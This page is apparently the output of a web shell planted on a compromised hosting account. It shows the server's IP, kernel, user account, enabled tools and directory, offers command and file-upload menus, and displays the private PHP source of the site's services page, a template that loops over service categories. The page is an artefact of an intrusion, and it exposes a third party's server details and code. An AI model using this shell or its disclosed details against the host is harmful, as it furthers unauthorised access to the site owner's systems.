MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.147.73.85
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/thedigitaldubai.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/thedigitaldubai.com/services.php
<?php include("site-header.php"); ?>


            <section>
                <div class="w-100 pt-60 position-relative">
                    <div class="fixed-bg" style="background-image: url(<?=$site_url?>/assets/images/bg10.jpg);"></div>
                    <div class="container">
                        <div class="page-title-wrap text-center w-100 d-inline-block">
                            <div class="page-title-inner d-inline-block">
                                <h2 class="mb-0 text-color7">Our Services</h2>
                            </div>
                            <div class="breadcrumbs-wrap w-100">
                                <ul class="breadcrumbs mb-0 list-unstyled d-inline-flex">
                                    <li><a href="<?=$site_url?>" title="Home">Home</a></li>
                                    <li class="active">Our Services</li>
                                </ul><!-- Breadcrumbs -->
                            </div>
                        </div><!-- Page Title Wrap -->
                    </div>
                </div>
            </section>
            <section>
                <div class="w-100 pt-90 pb-80">
                    <div class="blog-wrap w-100 px-15">
                        <div class="row">

                             <!-- Section Title Style 2 -->
<?php
$index_ser_sql=db_query("select * from  tbl_category where category_status='Active' and category_parent_id='0' order by category_order_by asc ");
while($index_ser_res=mysqli_fetch_array($index_ser_sql))
{
?>

                            <div class="col-md-6 col-sm-6 col-lg-4">
                                <article class="post-style1 w-100 brd-rd20 overflow-hidden position-relative">
                                    <div class="post-img overflow-hidden w-100">
                                        <a class="d-block" href="<?=$site_url?>/<?=$index_ser_res['category_url']?>.html" title="<?=$index_ser_res['category_name']?>">
                                            <img class="img-fluid w-100" src="<?=$site_url?>/uploaded_files/<?=$index_ser_res['category_image_name']?>" alt="<?=str_replace("LOCATION",$locationName,$index_ser_res['category_image_alt_title'])?>" title="<?=str_replace("LOCATION",$locationName,$index_ser_res['category_image_alt_title'])?>"></a>
                                    </div>
                                    <div class="post-info w-100 position-relative">
                                     <!--    <a class="brd-rd10 text-uppercase" href="javascript:void(0);" title="">Facebook Ads</a> -->
                                        <h3 class="mb-0"><a href="<?=$site_url?>/<?=$index_ser_res['category_url']?>.html" title="<?=str_replace("LOCATION",$locationName,$index_ser_res['category_image_alt_title'])?>"><?=$index_ser_res['category_name']?></a></h3>
                                        <p class="mb-0">
                                            <?php
                                            $index_ser_desc=strip_tags($index_ser_res['category_short_description']);
                                            echo str_replace("LOCATION",$locationName,substr($index_ser_desc, 0,125))."...";
                                            ?>
                                            

                                    
                                    </p>
                                        <!-- <span class="pst-cat d-inline-block"><a href="javascript:void(0);" title="">mobile</a>, <a href="javascript:void(0);" title="">web</a></span> -->
                                    </div>
                                     <div class="post-bottom-info overflow-hidden">
                                        <div class="post-author">
                                            <a href="<?=$site_url?>/<?=$index_ser_res['category_url']?>.html" title="<?=$index_ser_res['category_name']?>">
                                               <!--  <img class="img-fluid rounded-circle" src="assets/images/author-img.png" alt="Author image"> --><span>Read More <i class="fa fa-angle-right"></i></span></a>
                                        </div>
                                      
                                    </div>
                                </article>
                            </div>

<?}?>
                           
                           
                            
                            
                        </div>
                    </div><!-- Blog Wrap -->
                </div>
            </section>


          <?php include("site-footer.php"); ?>

MMCT - 2023